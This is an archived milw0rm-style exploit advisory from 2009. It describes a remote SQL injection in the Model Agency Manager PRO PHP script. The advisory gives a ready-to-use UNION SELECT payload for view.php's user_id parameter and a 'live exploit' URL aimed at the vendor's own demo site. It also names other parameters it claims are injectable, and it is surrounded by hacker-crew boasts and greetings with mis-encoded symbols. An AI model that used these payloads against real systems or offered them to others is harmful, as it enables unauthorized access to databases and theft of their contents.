[â˜¢] â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢{Ø¨Ø³Ù… Ø§Ù„Ù„Ù‡ Ø§Ù„Ø±Ø­Ù…Ù† Ø§Ù„Ø±Ø­ÙŠÙ…}â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢
[â˜ ]
[~] Tybe:(view.php user_id) Remote SQL Injection Vulnerability
[â˜ ]
[~] Vendor: www.phpmodelagencyscript.com
[â˜ ]
[â˜ ] Software: Model Agency Manager PRO
[â˜ ]
[â˜ ] author: ((Ñ3d D3v!L))
[â˜ ]
[â˜ ] Date: 7.9.2009
[â˜ ]
[â˜ ] Home: CL0S3D
[â˜ ]
[â˜ ] contact: X@hotmail.co.jp
[â˜ ]â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ {DEV!L'5 of SYST3M}â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ 

[â˜ ] Exploit:

[â˜ ] XxX/view.php?user_id= EV!L !NJECT
[â˜ ] (EV!L !NJ3c7):1%20union%20select%20user(),2,3,4/*&view=photos

[â˜ ] L!VE Exploit:
http://model-agency-manager-pro.phpmodelagencyscript.com/view.php?user_id=1%20union%20select%20user(),2,3,4/*&view=photos
[â˜ ]MORE ER0RR:
photos.php?user_id=((Ñ3d D3v!L))

motm.php?user_id=((DEV!L-Ro007))
forum_message.php?id=((STr0KE))

[â˜ ]

N073:
REAL R3d-d3V!L !S h3R3 LAM3RZ ((â˜ Xâ˜ ))

ARAB!AAN HAAACCKER !!

[~]-----------------------------{str0ke}-----------------------------------------------------
[~] Greetz tO: {str0ke} & DEV!L R007 & 8orn 2 K!LL & D.MODY & G0G0 & arabian hacker & EL z0hery
[~]
[~] spechial thanks : ((dolly)) & ((7am3m)) & ghost L0v3R & Û©ÛžÛ©à¹‘ Ø¹Ù…Ø§Ø¯ à¹‘Û©ÛžÛ© & {0rashey}
[~]
[â˜ ] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~]!'M 4r48!4N 3xPLO!T3R
[~]
[~]--------------------------------------------------------------------------------

# milw0rm.com [2009-09-09]